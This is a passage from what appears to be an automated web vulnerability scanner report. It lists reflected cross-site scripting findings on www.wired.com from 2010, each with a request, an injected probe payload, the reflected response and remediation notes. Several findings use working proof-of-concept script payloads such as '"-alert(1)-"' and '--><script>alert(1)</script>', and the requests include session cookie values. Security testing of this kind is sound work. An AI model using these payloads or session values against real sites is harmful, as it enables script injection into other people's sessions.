This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software46357"><a>d3030e2a7bf/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29197 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 20:04:06 GMT Date: Sun, 21 Nov 2010 20:00:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software46357"><a>d3030e2a7bf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef060"><a>0d554ac2111 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /softwareef060"><a>0d554ac2111/coolapps HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29217 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:17:02 GMT Date: Sun, 21 Nov 2010 23:13:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_softwareef060"><a>0d554ac2111 ss_coolapps"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64fc1"><a>b463da81548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software/coolapps64fc1"><a>b463da81548 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29217 Vary: Accept-Encoding Cache-Control: max-age=595 Expires: Sun, 21 Nov 2010 23:23:19 GMT Date: Sun, 21 Nov 2010 23:13:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software ss_coolapps64fc1"><a>b463da81548"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dbd9"><a>73f2b0aee60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software1dbd9"><a>73f2b0aee60/softwarereviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29231 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:17:07 GMT Date: Sun, 21 Nov 2010 23:13:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software1dbd9"><a>73f2b0aee60 ss_softwarereviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504ae"><a>019705efbbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software/softwarereviews504ae"><a>019705efbbb HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29231 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:29 GMT Date: Sun, 21 Nov 2010 23:13:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software ss_softwarereviews504ae"><a>019705efbbb"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f306"><a>9703cc9441c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software4f306"><a>9703cc9441c/webservices HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29223 Vary: Accept-Encoding Cache-Control: max-age=237 Expires: Sun, 21 Nov 2010 23:17:05 GMT Date: Sun, 21 Nov 2010 23:13:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software4f306"><a>9703cc9441c ss_webservices"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 572c1"><a>7e145b38693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software/webservices572c1"><a>7e145b38693 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29223 Vary: Accept-Encoding Cache-Control: max-age=579 Expires: Sun, 21 Nov 2010 23:23:10 GMT Date: Sun, 21 Nov 2010 23:13:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software ss_webservices572c1"><a>7e145b38693"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc26d"><a>623e3dbca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /special_multimediacc26d"><a>623e3dbca4/2008/ff_futurefood_1611 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29335 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:21:50 GMT Date: Mon, 22 Nov 2010 01:11:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_special_multimediacc26d"><a>623e3dbca4 ss_2008 c_ff_futurefood_1611"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34135"><a>b00375039a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /special_multimedia/200834135"><a>b00375039a/ff_futurefood_1611 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 500 Internal Server Error Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:16:23 GMT Date: Mon, 22 Nov 2010 01:12:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ...[SNIP]... <body class="s_special_multimedia ss_200834135"><a>b00375039a c_ff_futurefood_1611"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0c76"-alert(1)-"ba8f642ff66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /special_multimedia/2008f0c76"-alert(1)-"ba8f642ff66/ff_futurefood_1611 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 500 Internal Server Error Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:16:27 GMT Date: Mon, 22 Nov 2010 01:12:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfab"-alert(1)-"73871f1db9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /special_multimedia/2008/ff_futurefood_1611ebfab"-alert(1)-"73871f1db9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 500 Internal Server Error Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:22:59 GMT Date: Mon, 22 Nov 2010 01:12:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0cec"><a>2ea48508115 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /special_multimedia/2008/ff_futurefood_1611b0cec"><a>2ea48508115 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 500 Internal Server Error Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:22:43 GMT Date: Mon, 22 Nov 2010 01:12:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ...[SNIP]... <body class="s_special_multimedia ss_2008 c_ff_futurefood_1611b0cec"><a>2ea48508115"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload b8357--><script>alert(1)</script>dd4af33e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /supportb8357--><script>alert(1)</script>dd4af33e9c/feedback.html HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29404 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:37 GMT Date: Mon, 22 Nov 2010 01:10:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /supportb8357--><script>alert(1)</script>dd4af33e9c/feedback.html --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da586"><a>3aec687011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /supportda586"><a>3aec687011/feedback.html HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:27 GMT Date: Mon, 22 Nov 2010 01:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_supportda586"><a>3aec687011 ss_feedback.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5811a"><a>144635f756b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /support/feedback.html5811a"><a>144635f756b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29358 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:37 GMT Date: Mon, 22 Nov 2010 01:10:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_support ss_feedback.html5811a"><a>144635f756b"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a49de--><script>alert(1)</script>e92652d32ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /support/feedback.htmla49de--><script>alert(1)</script>e92652d32ce HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29406 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Mon, 22 Nov 2010 01:14:48 GMT Date: Mon, 22 Nov 2010 01:10:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /support/feedback.htmla49de--><script>alert(1)</script>e92652d32ce --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff7c9"><a>a3e95ddbbaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbizff7c9"><a>a3e95ddbbaf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29347 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Mon, 22 Nov 2010 01:15:36 GMT Date: Mon, 22 Nov 2010 01:11:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbizff7c9"><a>a3e95ddbbaf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71ee4"><a>10a4cbe8c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz71ee4"><a>10a4cbe8c8f/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29348 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Sun, 21 Nov 2010 20:04:42 GMT Date: Sun, 21 Nov 2010 20:00:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz71ee4"><a>10a4cbe8c8f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f59d"><a>02f6b01dd4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz3f59d"><a>02f6b01dd4f/it HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
